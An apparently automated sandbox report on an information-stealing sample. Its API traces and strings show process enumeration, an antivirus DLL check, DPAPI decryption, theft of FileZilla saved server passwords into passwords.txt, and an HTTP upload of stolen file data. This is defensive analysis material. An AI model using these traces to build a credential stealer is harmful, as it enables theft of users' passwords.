Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction ID: d89f910ec230dae430ffd6d330d852df9ea80ceecc6bcaa0146556bb21002fe4
Opcode Fuzzy Hash: 3201426b776385a3cec3b57894168fff0e077abb9657e76df344b0d488c20950
Instruction Fuzzy Hash: 75314F71900328AFCB20EF65DD89BDEB3B9AB04304F5045EAF519A3152D7B86EC58F54

Function 0041257F Relevance: 9.0, APIs: 6, Instructions: 37processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00412589
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
StrCmpCA.SHLWAPI(?), ref: 004125DC
CloseHandle.KERNEL32(00000000), ref: 004125F0

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID:
API String ID: 1799959500-0
Opcode ID: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction ID: d2a27fa508e6c3a354df25509a6f4190b9582d57abc1eee0c1e907853c614cd1
Opcode Fuzzy Hash: c9d347d910f7b4a70f950499f2b0cdb52079f09d3bb31312a8c8ade1b0a83c2a
Instruction Fuzzy Hash: 3B0162316002249BDB619B60DD44FEA76FD9B14301F8400E6E40DD2251EA798F949B25

Function 004080A1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

DPAPI, xrefs: 004080A9

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction ID: 09c146c598fe2db9e3360274f95d94fd5a71afecc77b7c133579c0d37eeb6d97
Opcode Fuzzy Hash: 68541e4e27b52eb825a4d6409286c391da9f85c95d41b42c5068ab7ee50209a7
Instruction Fuzzy Hash: 5901ECB5A01218EFCB04DFA8D88489EBBB9FF48754F158466E906E7341D7719F05CB90

Function 004114A5 Relevance: 6.1, APIs: 4, Instructions: 56processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Process32Next.KERNEL32(00000000,00000128), ref: 00411542
CloseHandle.KERNEL32(00000000), ref: 0041154D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 907984538-0
Opcode ID: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction ID: df159de601ea63d42004a6701442e9789206b56ac97d0af79a31bc2d218e3f7e
Opcode Fuzzy Hash: 6ecd6e103f958e55985b85a8d6cec58a1d4901635c4c4c9a6a92631ed1d39a01
Instruction Fuzzy Hash: FB117371A00214ABDB21EB65DC85BED73A9AB48308F400097F905A3291DB78AEC59B69

Function 00410D2E Relevance: 6.0, APIs: 4, Instructions: 35memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
HeapAlloc.KERNEL32(00000000), ref: 00410D50
GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
wsprintfA.USER32 ref: 00410D7D

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction ID: 3462f644bc87497e0213169472e2bde5c7d2207eb6d596ae75af8f0473202e49
Opcode Fuzzy Hash: 8121b2989182859caeafca9d685060af6f757cf6148b1a30633017c65544c455
Instruction Fuzzy Hash: 78F0E070A0132467EB04DFB4EC49B9B37659B04729F100295F511D71D0EB759E848785

Function 00410C53 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction ID: a2d0142ef4c2f8337792e91bc85231d42bd55b383edadc254ac7c872ecc74bf6
Opcode Fuzzy Hash: 51a8186674da40b627bafe0667fb054b0b372cb9ea4a64be279c17a6e1cb1c3a
Instruction Fuzzy Hash: 33D05EB6200208BBD7449BD5EC8DF8E7BBCEB85725F100265FA46D2290DAF099488B34

Function 00410FBA Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 00410FD4
wsprintfA.USER32 ref: 00410FEC

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction ID: 6e5c45132ae1b45d6529ef5bd4d0c5c9796b2e2d3bf3e93bb3fd0621c026135a
Opcode Fuzzy Hash: 67b530403a9dc94f78866dc1dd254330b8edc701593f238e5f24d625af2237fc
Instruction Fuzzy Hash: E8E092B0D1020D9BCF04DF60EC459DE77FCEB08208F4055B5A505E3180D674AB89CF44

Function 004014AD Relevance: 1.3, APIs: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,?,00401503,avghookx.dll,00418544), ref: 004014DF

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction ID: b529297655fd12c0b63a16027a5c7bdef515ed443d31e096b8a78f326fd23762
Opcode Fuzzy Hash: 01ffdcfc4a170f1596b26d300e4d9eeb94101c14574aad42e0c58a83c969e199
Instruction Fuzzy Hash: C1F08C32A00150EBCF20CF59D804AAAFBB8EB43760F257065E809B3260C334ED11EA9C

Function 00405482 Relevance: 72.3, APIs: 25, Strings: 16, Instructions: 573
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

lstrlenA.KERNEL32(?), ref: 00405519

Part of subcall function 00411E5D: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
Part of subcall function 00411E5D: GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
Part of subcall function 00411E5D: HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004056C0
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405704
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405736

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

lstrlenA.KERNEL32(?,",file_data,00437850,------,00437844,?,",00437838,------,0043782C,6c8ce6f422a1d9cf34f23d1c2168e754,",build_id,00437814,------), ref: 00405C67
lstrlenA.KERNEL32(?), ref: 00405C7A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405C92
HeapAlloc.KERNEL32(00000000), ref: 00405C99
lstrlenA.KERNEL32(?), ref: 00405CA6
_memmove.LIBCMT ref: 00405CB4
lstrlenA.KERNEL32(?,?,?), ref: 00405CC9
_memmove.LIBCMT ref: 00405CD6
lstrlenA.KERNEL32(?), ref: 00405CE4
lstrlenA.KERNEL32(?,?,00000000), ref: 00405CF2
_memmove.LIBCMT ref: 00405D05
lstrlenA.KERNEL32(?,?,00000000), ref: 00405D1A
HttpSendRequestA.WININET(?,?,00000000), ref: 00405D2D
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405D6F
InternetReadFile.WININET(?,?,000007CF,?), ref: 00405E26
StrCmpCA.SHLWAPI(?,block), ref: 00405E3B
ExitProcess.KERNEL32 ref: 00405E46

Strings

", xrefs: 00405C35
ERROR, xrefs: 00405F2F
", xrefs: 0040597B
", xrefs: 00405AD8
", xrefs: 0040581B
------, xrefs: 00405605
------, xrefs: 00405B5D
block, xrefs: 00405E30
build_id, xrefs: 0040594F
------, xrefs: 004059FF
ERROR, xrefs: 00405D79
6c8ce6f422a1d9cf34f23d1c2168e754, xrefs: 004059A7
--, xrefs: 00405600
------, xrefs: 0040589D
------, xrefs: 0040573C
file_data, xrefs: 00405C09

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
String ID: ------$"$"$"$"$--$------$------$------$------$6c8ce6f422a1d9cf34f23d1c2168e754$ERROR$ERROR$block$build_id$file_data
API String ID: 2638065154-2931481507
Opcode ID: 49e8160259788c3aa0c17ed973ab76f6e22aa84209453d778485c91eba621b05
Instruction ID: a1f310b16752a75a1e3861b17425502ee47d614580a36b5f1e1f8e1f13a41955
Opcode Fuzzy Hash: 49e8160259788c3aa0c17ed973ab76f6e22aa84209453d778485c91eba621b05
Instruction Fuzzy Hash: 3742E671D401699BDF21FB21DC45ACDB3B9BF04308F0085E6A548B3152DAB86FCA9F98

Function 0040E6CF Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 289
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

strtok_s.MSVCRT ref: 0040E77E
GetProcessHeap.KERNEL32(00000000,000F423F,00436912,0043690F,0043690E,0043690D), ref: 0040E7C4
HeapAlloc.KERNEL32(00000000), ref: 0040E7CB
StrStrA.SHLWAPI(00000000,<Host>), ref: 0040E7DF
lstrlenA.KERNEL32(00000000), ref: 0040E7EA
StrStrA.SHLWAPI(00000000,<Port>), ref: 0040E81E
lstrlenA.KERNEL32(00000000), ref: 0040E829
StrStrA.SHLWAPI(00000000,<User>), ref: 0040E857
lstrlenA.KERNEL32(00000000), ref: 0040E862
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040E890
lstrlenA.KERNEL32(00000000), ref: 0040E89B
lstrlenA.KERNEL32(?), ref: 0040E901
lstrlenA.KERNEL32(?), ref: 0040E915
lstrlenA.KERNEL32(0040ECBC), ref: 0040EA3D

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

passwords.txt, xrefs: 0040EA4D
<Host>, xrefs: 0040E7D9
<Pass encoding="base64">, xrefs: 0040E88A
Host: , xrefs: 0040E954
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0040E71F
Soft: FileZilla, xrefs: 0040E948
<Port>, xrefs: 0040E818
Password: , xrefs: 0040E9AE
Login: , xrefs: 0040E98C
<User>, xrefs: 0040E851

Memory Dump Source

Source File: 00000004.00000002.2766039693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2766039693.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2766039693.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
API String ID: 4146028692-935134978
Opcode ID: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction ID: 2e9f852a615408e756f1d7d3730d5668bfc6bf7d6dc94c0724fe4efb67adb4f0
Opcode Fuzzy Hash: daf18828ca77f1c77d3f07f28c52861645635e7fac20ced428b2830730ead7d9
Instruction Fuzzy Hash: 6FA17572A40219BBCF01FBA1DD4AADD7775AF08305F105426F501F30A1EBB9AE498F99

Function 00406BB5 Relevance: 63.6, APIs: 20, Strings: 16, Instructions: 598
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406C54
StrCmpCA.SHLWAPI(?), ref: 00406C72
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406E0A
HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00406E4E
lstrlenA.KERNEL32(?,",status,00437998,------,0043798C,",task_id,00437978,------,0043796C,",mode,00437958,------,0043794C), ref: 0040753C
lstrlenA.KERNEL32(?), ref: 0040754B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407556
HeapAlloc.KERNEL32(00000000), ref: 0040755D
lstrlenA.KERNEL32(?), ref: 0040756A
_memmove.LIBCMT ref: 00407578
lstrlenA.KERNEL32(?), ref: 00407586
lstrlenA.KERNEL32(?,?,00000000), ref: 00407594
_memmove.LIBCMT ref: 004075A1
lstrlenA.KERNEL32(?,?,00000000), ref: 004075B6
HttpSendRequestA.WININET(00000000,?,00000000), ref: 004075C4
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00407621
InternetCloseHandle.WININET(00000000), ref: 0040762C
InternetCloseHandle.WININET(?), ref: 00407638
InternetCloseHandle.WININET(?), ref: 00407644
